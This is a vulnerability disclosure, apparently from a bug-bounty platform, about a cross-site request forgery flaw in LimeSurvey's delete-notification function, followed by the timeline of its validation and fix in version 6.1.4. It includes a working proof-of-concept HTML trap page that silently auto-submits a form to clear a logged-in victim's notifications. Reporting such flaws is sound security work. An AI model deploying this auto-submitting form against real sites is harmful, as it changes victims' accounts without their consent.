CSRF in the delete notification function in limesurvey/limesurvey

Valid

Reported on

Jun 26th 2023

Description

The web application is vulnerable to CSRF in the delete notification function.

Proof of Concept

Step 1: See that user demo has some notifications. Step 2: Host an HTML trap page and send the URL to the victim

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.limesurvey.org/index.php">
      <input type="hidden" name="r" value="admin&#47;notification" />
      <input type="hidden" name="sa" value="clearAllNotifications" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

And the malicious URL

http://burpsuite/show/2/5np4472rgaki62jd3bl8wjkuie64o8ko

Step 3: After the user clicks on the malicious URL, verify that the notifications are cleared.

Impact

The CSRF vulnerability could trick users to delete all notifications

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago

Carsten Schmitz

commented 3 months ago

Maintainer

Internal reference: #18924

Carsten Schmitz validated this vulnerability 3 months ago

tuannq2299 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carsten Schmitz marked this as fixed in 6.1.4 with commit b9622b 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Carsten Schmitz published this vulnerability 2 months ago

to join this conversation